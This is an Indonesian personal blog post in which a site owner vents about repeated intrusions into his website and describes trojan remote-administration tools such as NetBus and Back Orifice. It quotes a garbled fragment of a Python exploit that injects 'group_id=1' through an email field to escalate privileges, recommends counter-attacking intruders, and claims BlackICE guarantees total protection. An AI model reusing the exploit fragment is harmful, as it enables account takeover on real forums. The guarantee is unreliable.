Sebenarnya saya tidak tertarik menulis artikel yang bertemakan hacker atau cracker, karena saya bukan termasuk anggota populasi dari keduanya itu. Saya hanyalah orang awam yang mau berbagi informasi dengan orang lain tanpa jualan buku-buku. Tapi karena hari Kamis tanggal 23 April 2009 website saya disusupi orang iseng yang saya sebut "Hacker Tolol" dan merupakan sudah kedua kalinya ulah ini dilakukan, saya terpancing menulis artikel ini.

Saya sebut "hacker tolol", karena salah satu dari banyak alasan lainnya, yaitu apa nggak manusia tolol menyusup ke website pribadi seperti saya punya ini. Apa sih yang mau dicari? Apa untungnya? dasar tolol alias o'on.
Hacker Karbitan Belajar Membabi Buta dengan Menggunakan Tools-Tools Hacking

Hacker karbitan!, mungkin ini hanya istilah saya sendiri. Apa yang dimaksudkan dengan hacker karbitan adalah para hacker dadakan yang sebelumnya tidak pernah memiliki keterampilan program-memprogram tiba-tiba telah berkelakuan mengendap-endap memasuki sistem suatu website atau server dengan menggunakan tools-tools hacking yang bisa didownload secara gratisan dari beberapa website.

Hacker karbitan belajar secara membabi buta untuk berhacking ria dengan menggunakan aplikasi-aplikasi remote administration system berbasis client/server yang beroperasi pada celah-celah sistem antara lain pada port 31337, port 12345 dan port 20034. Aplikasi ini juga dilengkapi dengan sebuah program yang berfungsi untuk menjembatani client agar dapat masuk dan mengakses semua sumber daya pada komputer lain, yang dalam hal ini disebut sebagai “server,” Jika program tersebut sedang aktif di komputer orang lain, maka dapat dipastikan bahwa si hacker karbitan akan leluasa mengakses semua isi hard disk komputer orang lain tanpa mengalami kesulitan sedikit pun. Aplikasi ini ada yang bisa terlihat oleh Anti Virus, seperti PATCH.EXE milik NetBus yang bisa dilihat atau dideteksi oleh anti virus. Jika pemilik PC yang dihacking berhasil menemukannya dalam direktori C:\WINDOWS dan menghapusnya, maka saat itu juga si hacker karbitan akan kehilangan akses, dan ada pula aplikasi yang tidak dapat terdeteksi oleh anti virus, karena memang aplikasi sudah tidak dapat lagi ditemukan dalam hard disk. Pada saat program tersebut aktif secara otomatis langsung berubah menjadi sesuatu yang misterius dan tidak berwujud.

Korban yang bisa menjadi target untuk di-remote yaitu dengan mengisi IP addres atau host target pada aplikasi tersebut. Apabila target telah dapat di-remote, maka si hacker dadakan bisa secara leluasa melakukan hal-hal seperti antara lain: menambah/menghapus nilai registry, reboot sistem, mengirim dan menerima file, melihat pasword yg tercache, membuat proses, dan lain-lain.

Sedangkan hacker yang bukan karbitan setidak-tidaknya telah mahir menggunakan bahasa pemrograman Java, C, C++, atau yang lebih baik lagi bila ia sangat menguasai bahasa pemrograman Assembly (bahasa mesin). Dan sudah barang tentu para hacker ini paham akan apa yang telah dibuatnya dan dengan kemampuan pemrogramannya ia akan selalu meng-update teknik-teknik hackingnya, serta terus berinovasi sebebasnya. Berikut ini salah satu contoh potongan program hacking e-mail SQL injection.

.............. potongannya

#Retrive cookie

params = {

¢¥req_username¢¥ : username,

¢¥req_password¢¥ : password,

¢¥form_sent¢¥ : 1

}

wclient = urllib.URLopener()

print "[+] Terhubung ke retrieve carlie"

req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))

info = req.info()

if ¢¥set-cookie¢¥ not in info:

print "[-] Kagak bisa retrieve cookie... terjadi kesalahan"

sys.exit(-3)

cookie = info[¢¥set-cookie¢¥]

cookie = cookie[:string.find(carlie, ¢¥;¢¥)]

print "[+] cookie found - extracting user_id"

user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]

print "[+] User-ID: %d" % (int(user_id))

wclient.addheader(¢¥cookie¢¥, cookie);

email = ¢¥"¢¥ + email[:string.find(email, ¢¥@¢¥)] + ¢¥"@¢¥ + email[string.find(email, ¢¥@¢¥)+1:]

+ ¢¥,"¢¥,¢¥

append = ¢¥group_id=¢¥1¢¥

email = email + ( ((50-len(append))-len(email)) * ¢¥ ¢¥ ) + append + ¢¥"@¢¥ + domain

params = {

¢¥req_new_email¢¥ : email,

¢¥form_sent¢¥ : 1

}

dan seterusnya...............

Menghadang Para Hacker Karbitan yang menggunakan Tools-tools Hacking

Bagaimana cara menghadang mereka yang mendeklarasikan dirinya sebagai hacker (saya menamainya hacker karbitan), yang kerjanya sehari-hari mungkin hanya ingin mengintimidasi dan mempermainkan anda, saya, dan pengguna Internet lain.

Salah satu cara yang paling gampang untuk melakukan hal itu adalah dengan menggunakan program NetBuster. Program tersebut bisa anda peroleh gratis di alamat http://surf.to/netbuster atau www16.brinkster.com/erytricksy/Software/ netbuster_v131.zip, kalau masih tersedia. NetBuster adalah program berfungsi untuk mempermainkan para hacker karbitan yang masuk ke dalam komputer kita, juga dimungkinkan untuk melakukan serangan balik ke komputer orang tersebut. Bisa melalui program NetBuster itu sendiri atau program hacking lain seperti NetHacker, Back Orifice, Deep Back Orifice, dan sebagainya. Dengan aplikasi ini Anda juga bisa melakuka serangan balik, dengan menjebak dan mempermainkan para hacker karbitan.

Anda juga bisa menggunakan BlackICE Defender. BlackICE Defender adalah software anti hacker yang terbaik dan sangat handal. Dengan BlackICE Defender, maka dapat dipastikan bahwa komputer atau jaringan komputer anda akan terhindar dari hacker. BlackICE terbuat dari alat pelacak yang kekuatannya sangat baik dan sekaligus sebagai mesin analisis yang dapat menampilkan semua lalu-lintas port jaringan dan protokol yang dicurigai. BlackICE akan langsung mengirim dan merekam aktifitas hacker yang terdetekasi menyusup ke dalam file log. Kemudian informasi tentang penyerang tersebut akan dilaporkan ke dalam tab Intruders. Sedangkan informasi tentang jenis serangan yang dilakukan para penggangu tersebut akan di coba ditampilkan ke dalam tab Attacks. BlackICE mengumpulkan informasi dari setiap serangan yang sudah dianalisis dengan menggunakan algoritma jaringan yang dibuat secara khusus. Jika serangan tersebut nantinya dianggap berpotensi menjadi intrusi, maka BlackICE akan secara otomatis memblok setiap akses yang dilakukan dari komputer (alamat IP) hacker tersebut. Dan asal anda tahu saja, biar bagaimana gigihnya pun hacker tersebut mencoba meng-crack sistem anda, dijamin orang tersebut tidak akan pernah berhasil masuk ke dalam lingkungan BlackICE.

Aplikasi BlackICE bisa Anda download melalui alamat situs www16.brinkster.net/erytricksy/ Software/, atau www.downloadstore.com/. Mudah-mudahan masih tersedia, sebab semua informasi yang saya berikan ini pun dadakan dengan mengingat-ingat apa yang saya tahu beberapa tahun yang lalu. Bagaimana perkembangannya saat ini tidak saya ikuti lagi. Persoalannya yaitu karena saya bukan termasuk anggota populasi hacker dan cracker tersebut he..he..he.